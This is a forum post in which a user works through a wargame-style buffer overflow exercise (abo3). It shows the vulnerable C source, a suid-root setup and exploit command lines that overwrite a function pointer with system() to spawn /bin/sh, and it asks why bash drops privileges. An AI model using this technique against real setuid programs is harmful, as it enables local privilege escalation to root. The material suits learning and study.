Ok im exploiting a simple program by overwriting a function ptr with the address of system. I am passing "/bin/sh" to that. I had expected to end up with the same privaleges as i had before as I was under the impression that system() executes programs using /bin/sh which apparently drops priveleges. I wasnt disappointed in this regard
Code:
/* abo3.c *
* specially crafted to feed your brain by gera */
/* This'll prepare you for The Next Step */
int main(int argv,char **argc) {
extern system,puts;
void (*fn)(char*)=(void(*)(char*))&system;
char buf[256];
fn=(void(*)(char*))&puts;
strcpy(buf,argc[1]);
fn(argc[2]);
exit(1);
}
Quote:
nnp@torvalds:~/coding/geras/abo$ sudo chmod +s abo3
nnp@torvalds:~/coding/geras/abo$ ls -al
total 40
drwxr-xr-x 2 nnp users 4096 2006-05-18 21:03 .
drwxr-xr-x 3 nnp users 4096 2006-05-18 19:52 ..
-rwsr-sr-x 1 root root 11991 2006-05-18 20:50 abo3
-rw-r--r-- 1 nnp users 219 2006-05-18 19:53 abo3.c
-rwxr-xr-x 1 nnp users 11685 2006-05-18 21:03 test
-rw-r--r-- 1 nnp users 97 2006-05-18 20:05 test.c
nnp@torvalds:~/coding/geras/abo$ ./abo3 `perl -e 'print "\x60\x57\xef\xb7"x68'` "/bin/sh"
sh-3.00$ id
uid=1000(nnp) gid=100(users) groups=6(disk),10(wheel),17(audio),18(video),19(cdrom),100(users)
sh-3.00$
|
I was then talking to a friend of mine who said I was wrong and that /bin/sh did not drop privs. He showed me his output
Quote:
$ ls -al ./abo3 ; ./abo3 `perl -e 'print "\xc8\x61\xee\xb7" x 68'` "/bin/sh"
ykram -rwsr-xr-x 1 root root 11771 2006-05-18 15:09 ./abo3
ykram sh-3.00# whoami
ykram root
|
He is quite adamant that using the same method he ends up with an effective uid of 0. The man page has this to say on the matter
Quote:
system() will not, in fact, work properly from programs with suid or sgid privileges on systems on which /bin/sh is bash version 2, since bash 2 drops privileges on startup.
|
Both me and my friend are both using the same version though,
Quote:
nnp@torvalds:~$ /bin/sh --version
GNU bash, version 3.00.16(2)-release (i486-slackware-linux-gnu)
Copyright © 2004 Free Software Foundation, Inc.
nnp@torvalds:~$
|
Although his doesnt have the slackware specific part.
The thing is. If im root and run /bin/sh then in sh run /bin/sh again the prompt i get is still root so its quite obviously not dropping privs then but if i use the following program it does drop privs. Aghghh!!!!
Code:
nnp@torvalds:~$ ls -al | grep test | grep -v test.c | grep -v contest
-rwsr-sr-x 1 root root 15125 2006-05-19 19:06 test
nnp@torvalds:~$ cat test.c
#include <stdlib.h>
int main() {
system("/bin/sh");
return 0;
}
nnp@torvalds:~$ ./test
sh-3.00$ i
sh: i: command not found
sh-3.00$ id
uid=1000(nnp) gid=100(users) groups=6(disk),10(wheel),17(audio),18(video),19(cdrom),100(users)
sh-3.00$
also for some reason when i run the above program it takes the first letter i type as a command as if i pressed return...odd..
Anyone know what im misunderstanding?